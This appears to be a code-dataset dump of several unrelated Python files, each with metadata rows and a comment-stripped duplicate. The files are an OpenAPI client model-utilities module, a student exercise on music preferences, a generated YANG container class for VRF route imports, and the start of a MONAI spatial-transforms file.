child_req_types_by_current_type[list] = required_type
elif isinstance(required_type, tuple):
valid_classes.append(tuple)
child_req_types_by_current_type[tuple] = required_type
elif isinstance(required_type, dict):
valid_classes.append(dict)
child_req_types_by_current_type[dict] = required_type[str]
else:
valid_classes.extend(get_possible_classes(required_type, spec_property_naming))
return tuple(valid_classes), child_req_types_by_current_type
def change_keys_js_to_python(input_dict, model_class):
if getattr(model_class, 'attribute_map', None) is None:
return input_dict
output_dict = {}
reversed_attr_map = {value: key for key, value in
model_class.attribute_map.items()}
for javascript_key, value in input_dict.items():
python_key = reversed_attr_map.get(javascript_key)
if python_key is None:
# if the key is unknown, it is in error or it is an
# additionalProperties variable
python_key = javascript_key
output_dict[python_key] = value
return output_dict
def get_type_error(var_value, path_to_item, valid_classes, key_type=False):
error_msg = type_error_message(
var_name=path_to_item[-1],
var_value=var_value,
valid_classes=valid_classes,
key_type=key_type
)
return ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=valid_classes,
key_type=key_type
)
def deserialize_primitive(data, klass, path_to_item):
additional_message = ""
try:
if klass in {datetime, date}:
additional_message = (
"If you need your parameter to have a fallback "
"string value, please set its type as `type: {}` in your "
"spec. That allows the value to be any type. "
)
if klass == datetime:
if len(data) < 8:
raise ValueError("This is not a datetime")
# The string should be in iso8601 datetime format.
parsed_datetime = parse(data)
date_only = (
parsed_datetime.hour == 0 and
parsed_datetime.minute == 0 and
parsed_datetime.second == 0 and
parsed_datetime.tzinfo is None and
8 <= len(data) <= 10
)
if date_only:
raise ValueError("This is a date, not a datetime")
return parsed_datetime
elif klass == date:
if len(data) < 8:
raise ValueError("This is not a date")
return parse(data).date()
else:
converted_value = klass(data)
if isinstance(data, str) and klass == float:
if str(converted_value) != data:
# '7' -> 7.0 -> '7.0' != '7'
raise ValueError('This is not a float')
return converted_value
except (OverflowError, ValueError) as ex:
# parse can raise OverflowError
raise ApiValueError(
"{0}Failed to parse {1} as {2}".format(
additional_message, repr(data), klass.__name__
),
path_to_item=path_to_item
) from ex
def get_discriminator_class(model_class,
discr_name,
discr_value, cls_visited):
if model_class in cls_visited:
# The class has already been visited and no suitable class was found.
return None
cls_visited.append(model_class)
used_model_class = None
if discr_name in model_class.discriminator:
class_name_to_discr_class = model_class.discriminator[discr_name]
used_model_class = class_name_to_discr_class.get(discr_value)
if used_model_class is None:
# We didn't find a discriminated class in class_name_to_discr_class.
descendant_classes = model_class._composed_schemas.get('oneOf', ()) + \
model_class._composed_schemas.get('anyOf', ())
ancestor_classes = model_class._composed_schemas.get('allOf', ())
possible_classes = descendant_classes + ancestor_classes
for cls in possible_classes:
if hasattr(cls, 'discriminator') and cls.discriminator is not None:
used_model_class = get_discriminator_class(
cls, discr_name, discr_value, cls_visited)
if used_model_class is not None:
return used_model_class
return used_model_class
def deserialize_model(model_data, model_class, path_to_item, check_type,
configuration, spec_property_naming):
kw_args = dict(_check_type=check_type,
_path_to_item=path_to_item,
_configuration=configuration,
_spec_property_naming=spec_property_naming)
if issubclass(model_class, ModelSimple):
return model_class(model_data, **kw_args)
elif isinstance(model_data, list):
return model_class(*model_data, **kw_args)
if isinstance(model_data, dict):
kw_args.update(model_data)
return model_class(**kw_args)
elif isinstance(model_data, PRIMITIVE_TYPES):
return model_class(model_data, **kw_args)
def deserialize_file(response_data, configuration, content_disposition=None):
fd, path = tempfile.mkstemp(dir=configuration.temp_folder_path)
os.close(fd)
os.remove(path)
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "wb") as f:
if isinstance(response_data, str):
# change str to bytes so we can write it
response_data = response_data.encode('utf-8')
f.write(response_data)
f = open(path, "rb")
return f
def attempt_convert_item(input_value, valid_classes, path_to_item,
configuration, spec_property_naming, key_type=False,
must_convert=False, check_type=True):
valid_classes_ordered = order_response_types(valid_classes)
valid_classes_coercible = remove_uncoercible(
valid_classes_ordered, input_value, spec_property_naming)
if not valid_classes_coercible or key_type:
# we do not handle keytype errors, json will take care
# of this for us
if configuration is None or not configuration.discard_unknown_keys:
raise get_type_error(input_value, path_to_item, valid_classes,
key_type=key_type)
for valid_class in valid_classes_coercible:
try:
if issubclass(valid_class, OpenApiModel):
return deserialize_model(input_value, valid_class,
path_to_item, check_type,
configuration, spec_property_naming)
elif valid_class == file_type:
return deserialize_file(input_value, configuration)
return deserialize_primitive(input_value, valid_class,
path_to_item)
except (ApiTypeError, ApiValueError, ApiKeyError) as conversion_exc:
if must_convert:
raise conversion_exc
# if we have conversion errors when must_convert == False
# we ignore the exception and move on to the next class
continue
# we were unable to convert, must_convert == False
return input_value
def is_type_nullable(input_type):
if input_type is none_type:
return True
if issubclass(input_type, OpenApiModel) and input_type._nullable:
return True
if issubclass(input_type, ModelComposed):
# If oneOf/anyOf, check if the 'null' type is one of the allowed types.
for t in input_type._composed_schemas.get('oneOf', ()):
if is_type_nullable(t): return True
for t in input_type._composed_schemas.get('anyOf', ()):
if is_type_nullable(t): return True
return False
def is_valid_type(input_class_simple, valid_classes):
valid_type = input_class_simple in valid_classes
if not valid_type and (
issubclass(input_class_simple, OpenApiModel) or
input_class_simple is none_type):
for valid_class in valid_classes:
if input_class_simple is none_type and is_type_nullable(valid_class):
# Schema is oneOf/anyOf and the 'null' type is one of the allowed types.
return True
if not (issubclass(valid_class, OpenApiModel) and valid_class.discriminator):
continue
discr_propertyname_py = list(valid_class.discriminator.keys())[0]
discriminator_classes = (
valid_class.discriminator[discr_propertyname_py].values()
)
valid_type = is_valid_type(input_class_simple, discriminator_classes)
if valid_type:
return True
return valid_type
def validate_and_convert_types(input_value, required_types_mixed, path_to_item,
spec_property_naming, _check_type, configuration=None):
results = get_required_type_classes(required_types_mixed, spec_property_naming)
valid_classes, child_req_types_by_current_type = results
input_class_simple = get_simple_class(input_value)
valid_type = is_valid_type(input_class_simple, valid_classes)
if not valid_type:
if configuration:
# if input_value is not valid_type try to convert it
converted_instance = attempt_convert_item(
input_value,
valid_classes,
path_to_item,
configuration,
spec_property_naming,
key_type=False,
must_convert=True,
check_type=_check_type
)
return converted_instance
else:
raise get_type_error(input_value, path_to_item, valid_classes,
key_type=False)
# input_value's type is in valid_classes
if len(valid_classes) > 1 and configuration:
# there are valid classes which are not the current class
valid_classes_coercible = remove_uncoercible(
valid_classes, input_value, spec_property_naming, must_convert=False)
if valid_classes_coercible:
converted_instance = attempt_convert_item(
input_value,
valid_classes_coercible,
path_to_item,
configuration,
spec_property_naming,
key_type=False,
must_convert=False,
check_type=_check_type
)
return converted_instance
if child_req_types_by_current_type == {}:
# all types are of the required types and there are no more inner
# variables left to look at
return input_value
inner_required_types = child_req_types_by_current_type.get(
type(input_value)
)
if inner_required_types is None:
# for this type, there are not more inner variables left to look at
return input_value
if isinstance(input_value, list):
if input_value == []:
# allow an empty list
return input_value
for index, inner_value in enumerate(input_value):
inner_path = list(path_to_item)
inner_path.append(index)
input_value[index] = validate_and_convert_types(
inner_value,
inner_required_types,
inner_path,
spec_property_naming,
_check_type,
configuration=configuration
)
elif isinstance(input_value, dict):
if input_value == {}:
# allow an empty dict
return input_value
for inner_key, inner_val in input_value.items():
inner_path = list(path_to_item)
inner_path.append(inner_key)
if get_simple_class(inner_key) != str:
raise get_type_error(inner_key, inner_path, valid_classes,
key_type=True)
input_value[inner_key] = validate_and_convert_types(
inner_val,
inner_required_types,
inner_path,
spec_property_naming,
_check_type,
configuration=configuration
)
return input_value
def model_to_dict(model_instance, serialize=True):
result = {}
model_instances = [model_instance]
if model_instance._composed_schemas:
model_instances.extend(model_instance._composed_instances)
for model_instance in model_instances:
for attr, value in model_instance._data_store.items():
if serialize:
# we use get here because additional property key names do not
# exist in attribute_map
attr = model_instance.attribute_map.get(attr, attr)
if isinstance(value, list):
if not value:
# empty list or None
result[attr] = value
else:
res = []
for v in value:
if isinstance(v, PRIMITIVE_TYPES) or v is None:
res.append(v)
elif isinstance(v, ModelSimple):
res.append(v.value)
else:
res.append(model_to_dict(v, serialize=serialize))
result[attr] = res
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0],
model_to_dict(item[1], serialize=serialize))
if hasattr(item[1], '_data_store') else item,
value.items()
))
elif isinstance(value, ModelSimple):
result[attr] = value.value
elif hasattr(value, '_data_store'):
result[attr] = model_to_dict(value, serialize=serialize)
else:
result[attr] = value
return result
def type_error_message(var_value=None, var_name=None, valid_classes=None,
key_type=None):
key_or_value = 'value'
if key_type:
key_or_value = 'key'
valid_classes_phrase = get_valid_classes_phrase(valid_classes)
msg = (
"Invalid type for variable '{0}'. Required {1} type {2} and "
"passed type was {3}".format(
var_name,
key_or_value,
valid_classes_phrase,
type(var_value).__name__,
)
)
return msg
def get_valid_classes_phrase(input_classes):
all_classes = list(input_classes)
all_classes = sorted(all_classes, key=lambda cls: cls.__name__)
all_class_names = [cls.__name__ for cls in all_classes]
if len(all_class_names) == 1:
return 'is {0}'.format(all_class_names[0])
return "is one of [{0}]".format(", ".join(all_class_names))
def convert_js_args_to_python_args(fn):
from functools import wraps
@wraps(fn)
def wrapped_init(_self, *args, **kwargs):
spec_property_naming = kwargs.get('_spec_property_naming', False)
if spec_property_naming:
kwargs = change_keys_js_to_python(kwargs, _self.__class__)
return fn(_self, *args, **kwargs)
return wrapped_init
def get_allof_instances(self, model_args, constant_args):
composed_instances = []
for allof_class in self._composed_schemas['allOf']:
# no need to handle changing js keys to python because
# for composed schemas, allof parameters are included in the
# composed schema and were changed to python keys in __new__
# extract a dict of only required keys from fixed_model_args
kwargs = {}
var_names = set(allof_class.openapi_types.keys())
for var_name in var_names:
if var_name in model_args:
kwargs[var_name] = model_args[var_name]
# and use it to make the instance
kwargs.update(constant_args)
try:
allof_instance = allof_class(**kwargs)
composed_instances.append(allof_instance)
except Exception as ex:
raise ApiValueError(
"Invalid inputs given to generate an instance of '%s'. The "
"input data was invalid for the allOf schema '%s' in the composed "
"schema '%s'. Error=%s" % (
allof_class.__name__,
allof_class.__name__,
self.__class__.__name__,
str(ex)
)
) from ex
return composed_instances
def get_oneof_instance(cls, model_kwargs, constant_kwargs, model_arg=None):
if len(cls._composed_schemas['oneOf']) == 0:
return None
oneof_instances = []
# Iterate over each oneOf schema and determine if the input data
# matches the oneOf schemas.
for oneof_class in cls._composed_schemas['oneOf']:
# The composed oneOf schema allows the 'null' type and the input data
# is the null value. This is a OAS >= 3.1 feature.
if oneof_class is none_type:
# skip none_types because we are deserializing dict data.
# none_type deserialization is handled in the __new__ method
continue
single_value_input = allows_single_value_input(oneof_class)
if not single_value_input:
# transform js keys from input data to python keys in fixed_model_args
fixed_model_args = change_keys_js_to_python(
model_kwargs, oneof_class)
# Extract a dict with the properties that are declared in the oneOf schema.
# Undeclared properties (e.g. properties that are allowed because of the
# additionalProperties attribute in the OAS document) are not added to
# the dict.
kwargs = {}
var_names = set(oneof_class.openapi_types.keys())
for var_name in var_names:
if var_name in fixed_model_args:
kwargs[var_name] = fixed_model_args[var_name]
# do not try to make a model with no input args
if len(kwargs) == 0:
continue
# and use it to make the instance
kwargs.update(constant_kwargs)
try:
if not single_value_input:
oneof_instance = oneof_class(**kwargs)
else:
if issubclass(oneof_class, ModelSimple):
oneof_instance = oneof_class(model_arg, **constant_kwargs)
elif oneof_class in PRIMITIVE_TYPES:
oneof_instance = validate_and_convert_types(
model_arg,
(oneof_class,),
constant_kwargs['_path_to_item'],
constant_kwargs['_spec_property_naming'],
constant_kwargs['_check_type'],
configuration=constant_kwargs['_configuration']
)
oneof_instances.append(oneof_instance)
except Exception:
pass
if len(oneof_instances) == 0:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. None "
"of the oneOf schemas matched the input data." %
cls.__name__
)
elif len(oneof_instances) > 1:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. Multiple "
"oneOf schemas matched the inputs, but a max of one is allowed." %
cls.__name__
)
return oneof_instances[0]
def get_anyof_instances(self, model_args, constant_args):
anyof_instances = []
if len(self._composed_schemas['anyOf']) == 0:
return anyof_instances
for anyof_class in self._composed_schemas['anyOf']:
# The composed oneOf schema allows the 'null' type and the input data
# is the null value. This is a OAS >= 3.1 feature.
if anyof_class is none_type:
# skip none_types because we are deserializing dict data.
# none_type deserialization is handled in the __new__ method
continue
# transform js keys to python keys in fixed_model_args
fixed_model_args = change_keys_js_to_python(model_args, anyof_class)
# extract a dict of only required keys from these_model_vars
kwargs = {}
var_names = set(anyof_class.openapi_types.keys())
for var_name in var_names:
if var_name in fixed_model_args:
kwargs[var_name] = fixed_model_args[var_name]
# do not try to make a model with no input args
if len(kwargs) == 0:
continue
# and use it to make the instance
kwargs.update(constant_args)
try:
anyof_instance = anyof_class(**kwargs)
anyof_instances.append(anyof_instance)
except Exception:
pass
if len(anyof_instances) == 0:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. None of the "
"anyOf schemas matched the inputs." %
self.__class__.__name__
)
return anyof_instances
def get_additional_properties_model_instances(
composed_instances, self):
additional_properties_model_instances = []
all_instances = [self]
all_instances.extend(composed_instances)
for instance in all_instances:
if instance.additional_properties_type is not None:
additional_properties_model_instances.append(instance)
return additional_properties_model_instances
def get_var_name_to_model_instances(self, composed_instances):
var_name_to_model_instances = {}
all_instances = [self]
all_instances.extend(composed_instances)
for instance in all_instances:
for var_name in instance.openapi_types:
if var_name not in var_name_to_model_instances:
var_name_to_model_instances[var_name] = [instance]
else:
var_name_to_model_instances[var_name].append(instance)
return var_name_to_model_instances
def get_unused_args(self, composed_instances, model_args):
unused_args = dict(model_args)
# arguments apssed to self were already converted to python names
# before __init__ was called
for var_name_py in self.attribute_map:
if var_name_py in unused_args:
del unused_args[var_name_py]
for instance in composed_instances:
if instance.__class__ in self._composed_schemas['allOf']:
for var_name_py in instance.attribute_map:
if var_name_py in unused_args:
del unused_args[var_name_py]
else:
for var_name_js in instance.attribute_map.values():
if var_name_js in unused_args:
del unused_args[var_name_js]
return unused_args
def validate_get_composed_info(constant_args, model_args, self):
# create composed_instances
composed_instances = []
allof_instances = get_allof_instances(self, model_args, constant_args)
composed_instances.extend(allof_instances)
oneof_instance = get_oneof_instance(self.__class__, model_args, constant_args)
if oneof_instance is not None:
composed_instances.append(oneof_instance)
anyof_instances = get_anyof_instances(self, model_args, constant_args)
composed_instances.extend(anyof_instances)
# map variable names to composed_instances
var_name_to_model_instances = get_var_name_to_model_instances(
self, composed_instances)
# set additional_properties_model_instances
additional_properties_model_instances = (
get_additional_properties_model_instances(composed_instances, self)
)
# set any remaining values
unused_args = get_unused_args(self, composed_instances, model_args)
if len(unused_args) > 0 and \
len(additional_properties_model_instances) == 0 and \
(self._configuration is None or
not self._configuration.discard_unknown_keys):
raise ApiValueError(
"Invalid input arguments input when making an instance of "
"class %s. Not all inputs were used. The unused input data "
"is %s" % (self.__class__.__name__, unused_args)
)
# no need to add additional_properties to var_name_to_model_instances here
# because additional_properties_model_instances will direct us to that
# instance when we use getattr or setattr
# and we update var_name_to_model_instances in setattr
return [
composed_instances,
var_name_to_model_instances,
additional_properties_model_instances,
unused_args
]
| true | true |
f73279dc5fe54fd731c68c1129c641f01a89beae | 596 | py | Python | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | 2 | 2021-09-23T19:17:24.000Z | 2021-11-29T09:03:56.000Z | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | null | null | null | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | 1 | 2020-10-25T13:03:18.000Z | 2020-10-25T13:03:18.000Z | #definition for music_func goes here
def music_func(music, group, singer):
print("The best kind of music is", music)
print("The best music group is", group)
print("The best lead vocalist is", singer)
def main():
music, group, singer = '', '', ''
while music != 'quit':
try:
music, group, singer = input().split(',')
music_func(music, group, singer)
except (EOFError, ValueError):
music, group, singer = 'Classic Rock', 'The Beatles', 'Freddie Mercury'
music_func(music, group, singer)
quit()
main() | 33.111111 | 83 | 0.590604 |
def music_func(music, group, singer):
print("The best kind of music is", music)
print("The best music group is", group)
print("The best lead vocalist is", singer)
def main():
music, group, singer = '', '', ''
while music != 'quit':
try:
music, group, singer = input().split(',')
music_func(music, group, singer)
except (EOFError, ValueError):
music, group, singer = 'Classic Rock', 'The Beatles', 'Freddie Mercury'
music_func(music, group, singer)
quit()
main() | true | true |
f7327a79deea631d212afcb19ff20ebec7be7258 | 7,139 | py | Python | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import routes
class import_(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-vrf - based on the path /vrf/address-family/ip/unicast/ip/import. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__routes',)
_yang_name = 'import'
_rest_name = 'import'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'vrf', u'address-family', u'ip', u'unicast', u'ip', u'import']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'vrf', u'address-family', u'ipv4', u'unicast', u'ip', u'import']
def _get_routes(self):
"""
Getter method for routes, mapped from YANG variable /vrf/address_family/ip/unicast/ip/import/routes (list)
YANG Description: import IPV4 routes
"""
return self.__routes
def _set_routes(self, v, load=False):
"""
Setter method for routes, mapped from YANG variable /vrf/address_family/ip/unicast/ip/import/routes (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_routes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_routes() directly.
YANG Description: import IPV4 routes
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """routes must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)""",
})
self.__routes = t
if hasattr(self, '_set'):
self._set()
def _unset_routes(self):
self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
routes = __builtin__.property(_get_routes, _set_routes)
_pyangbind_elements = {'routes': routes, }
| 55.773438 | 779 | 0.713966 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import routes
class import_(PybindBase):
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__routes',)
_yang_name = 'import'
_rest_name = 'import'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'vrf', u'address-family', u'ip', u'unicast', u'ip', u'import']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'vrf', u'address-family', u'ipv4', u'unicast', u'ip', u'import']
def _get_routes(self):
return self.__routes
def _set_routes(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """routes must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)""",
})
self.__routes = t
if hasattr(self, '_set'):
self._set()
def _unset_routes(self):
self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
routes = __builtin__.property(_get_routes, _set_routes)
_pyangbind_elements = {'routes': routes, }
| true | true |
f7327aa07b2ff6ab2654821bbe8ee0851143350f | 121,870 | py | Python | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | 1 | 2022-03-16T01:18:43.000Z | 2022-03-16T01:18:43.000Z | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | null | null | null | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A collection of "vanilla" transforms for spatial operations
https://github.com/Project-MONAI/MONAI/wiki/MONAI_Design
"""
import warnings
from copy import deepcopy
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import numpy as np
import torch
from monai.config import USE_COMPILED, DtypeLike
from monai.config.type_definitions import NdarrayOrTensor
